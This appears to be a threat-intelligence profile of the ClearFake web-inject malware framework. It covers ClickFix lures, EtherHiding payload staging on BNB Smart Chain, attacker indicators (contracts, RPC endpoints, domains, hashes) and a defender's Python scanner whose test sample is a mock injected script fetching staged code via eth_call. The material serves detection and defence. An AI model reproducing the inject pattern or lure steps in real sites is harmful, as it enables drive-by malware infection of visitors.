ClearFake
ClearFake is a malicious JavaScript framework and web-inject activity cluster first observed in 2023 that compromises legitimate websites, often WordPress sites, by injecting malicious HTML and JavaScript. It is used for drive-by and ClickFix-style malware delivery, initially masquerading as fake browser updates and later evolving to fake browser errors, fake Google Chrome update prompts, fake Cloudflare Turnstile pages, and fake reCAPTCHA/CAPTCHA lures. On compromised sites, ClearFake commonly instructs victims to press Win+R, paste a clipboard-staged command, and execute it, leading to PowerShell- or mshta-based infection chains; newer variants abuse SyncAppvPublishingServer.vbs for proxy execution of hidden PowerShell. ClearFake is strongly associated with the EtherHiding technique, using Binance Smart Chain/BNB Smart Chain smart contracts and public RPC endpoints to retrieve staged JavaScript, routing logic, AES keys, lure URLs, commands, and victim-tracking data, which makes takedown and blocking more difficult. Reported behavior includes fetching and executing Base64-encoded and gzip-compressed code, anti-analysis checks for headless browsers, victim fingerprinting by OS/browser and language, and use of separate smart contracts for Windows and macOS payload delivery and infection tracking. Malware delivered by ClearFake in reported campaigns includes Lumma Stealer, Vidar, Stealc, Rhadamanthys, Amadey, IDAT Loader, HijackLoader, Emmenhtal Loader v2, AMOS Stealer, Amatera Stealer/ACR Stealer, SectopRAT, and other loaders or RATs. Proofpoint observed Amatera Stealer delivered via ClearFake website injects in April and May 2025, while Trend Micro reported ClearFake delivering SectopRAT and ACRStealer in 2026. The framework has been associated with threat cluster UNC5142 and is described as a primary user of the EtherHiding loader within the ClickFix ecosystem. 
Reported scale includes over 9,300 compromised websites identified in February 2025 and public smart-contract tracking suggesting close to 150,000 likely infections since August 2025. High-confidence indicators mentioned in public reporting include BNB Smart Chain-related wallet/contract addresses such as 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53, 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA, 0x8FBA1667BEF5EdA433928b220886A830488549BD, 0x80d31D935f0EC978253A26D48B5593599B9542C7, 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e, 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, 0xf4a32588b50a59a82fbA148d436081A48d80832A, and deployer wallet 0xd71f4cdC84420d2bd07F507b7A4F998b4c2d52c9; RPC endpoints including bsc-testnet-rpc.publicnode[.]com, bsc-testnet.drpc[.]org, and data-seed-prebsc-1-s1.bnbchain[.]org:8545; infrastructure and payload indicators including amaprox[.]icu, b1[.]talismanoverblown[.]com, cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load, put34b[.]camp, and C2 IP 34.41.139.193; and sample hashes including HTML SHA256 100cff1fb7d791f474d4c1d95428f8ecb2e8961824d7817b473920551da37ae5, DLL SHA256 4a1af31f881671df1ee3d4c3e8c0aa07c1da4aaf8142849543b80962c56839f1, and DLL SHA256 4d22efd2ea58e7643c5b6b82143c8978de7102356346fe4f5357807268cbad5d.
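An added defender-side example, not code from the page or from any vendor it cites: a small Python scanner that pulls inline and external scripts out of an HTML page and flags any that reference the BNB Smart Chain RPC endpoints or contract addresses listed above, plus two behavioural markers that are assumptions about how EtherHiding readers work (the JSON-RPC eth_call read and a Base64-then-gzip decode). The sample HTML is constructed and the indicator lists are a subset of the profile's IOCs.

```python
import re
from html.parser import HTMLParser

# Indicators copied from the ClearFake profile above (subset; extend from the
# full IOC list). Hostnames and addresses are compared case-insensitively.
RPC_HOSTS = (
    "bsc-testnet-rpc.publicnode.com",
    "bsc-testnet.drpc.org",
    "data-seed-prebsc-1-s1.bnbchain.org",
)
CONTRACTS = (
    "0x9179dda8b285040bf381aabb8a1f4a1b8c37ed53",
    "0x53fd54f55c93f9bcca471cd0ccbabc3acbd3e4aa",
    "0xd71f4cdc84420d2bd07f507b7a4f998b4c2d52c9",  # deployer wallet
)
# Behavioural markers (assumption, not from the page): an EtherHiding reader
# issues the JSON-RPC method eth_call, and the fetched blob is Base64-decoded
# and then gunzipped in the browser.
BEHAVIOUR = {
    "eth_call": re.compile(r"\beth_call\b"),
    "b64_gzip": re.compile(r"atob\s*\(.*?(gzip|DecompressionStream)", re.S),
}

class _ScriptGrabber(HTMLParser):
    """Collect inline <script> bodies and external src URLs from a page."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(("src", src))
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag.lower() == "script":
            body = "".join(self._buf).strip()
            if body:
                self.scripts.append(("inline", body))
            self._buf, self._in_script = [], False

def scan_page(html: str) -> list:
    """Return one finding per script that references EtherHiding indicators."""
    grabber = _ScriptGrabber()
    grabber.feed(html)
    findings = []
    for kind, body in grabber.scripts:
        low = body.lower()
        hits = [h for h in RPC_HOSTS if h in low]
        hits += [c for c in CONTRACTS if c in low]
        hits += [name for name, rx in BEHAVIOUR.items() if rx.search(body)]
        if hits:
            findings.append({"kind": kind, "hits": hits, "snippet": body[:60]})
    return findings

# Constructed sample: a benign page with one injected script (data placeholder).
SAMPLE_INJECT = """<html><body><p>legit content</p>
<script>
fetch("https://bsc-testnet-rpc.publicnode.com", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", method: "eth_call", params: [{
    to: "0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53", data: "0x..."}, "latest"]})})
  .then(r => r.json()).then(j => { const raw = atob(j.result);
    new DecompressionStream("gzip"); });
</script>
<script src="/js/app.js"></script></body></html>"""
```

Run `scan_page` over fetched copies of a site's pages; any hit on an RPC host or contract address is a strong signal, while the behavioural markers alone warrant a manual look at the script.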
Groups observed using it
2 distinct threat actors attributed by public researchers.
The CLEARFAKE campaign, associated with the threat cluster UNC5142, functions as a malicious JavaScript framework and often masquerades as a Google Chrome browser update pop-up on compromised websites. The primary function of the embedded JavaScript is to download a payload after a user clicks the "Update Chrome" button.
“VexTrio Viper runs the largest and oldest known TDS with over 165 affiliates including SocGholish and ClearFake.”
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (2 techniques)
Initial Access (2 techniques)
Execution (2 techniques)
Stealth (6 techniques)
JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted.
"ChromeSetup.exe downloads and executes the Microsoft Software Installer (MSI) package..." and "switches intended to avoid detection: /qn /quiet /norestart"
This stage performs several environment checks, such as inspecting for headless browser frameworks and evaluating the system’s user-agent string. If automated browsing behavior is detected, the execution chain terminates.
Discovery (4 techniques)
Fingerprint the victim using the User-Agent: The operating system; The web browser.
Collection (1 technique)
Command and Control (4 techniques)
Threat actors store data (for example C2 configuration) or code on a public blockchain... they can access it through a legitimate API endpoint... SharkStealer and ArechClient2... pull their C2 configuration from a smart contract... ZigCryptoStealer... uses smart contracts to receive their C2 configuration.
ClearFake fetches and executes base64 encoded and gzip compressed code... The initial smart contract delivers an obfuscated JavaScript payload... dynamically retrieves platform specific second-stage payloads... Java Stealer... continuously monitors the clipboard and further downloads additional payloads.
IOCs tracked for this family
222 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, and DNS infrastructure; file hashes (MD5, SHA-1, SHA-256); and other indicator types observed in public reporting.
Recent activity
32 sources tracked across advisories, community write-ups, and news.
A related malicious framework referenced for comparison because it also uses ClickFix-style lures and EtherHiding for malware delivery.
A web-based malware delivery framework that compromises legitimate websites and uses BNB Smart Chain testnet smart contracts to host and retrieve malicious JavaScript, enabling resilient payload delivery and anti-takedown command routing. It uses fake CAPTCHA/ClickFix lures and OS-aware staging to deliver follow-on malware to Windows and macOS victims.
A malware family using EtherHiding to fetch additional JavaScript payloads; it retrieves and executes base64-encoded, gzip-compressed code from smart contracts.
A ClickFix-style JavaScript framework that embeds malicious inline scripts into compromised websites, uses multiple smart contracts and blockchain RPC endpoints for staged delivery, performs environment checks, and serves OS-specific ClickFix prompts and payloads.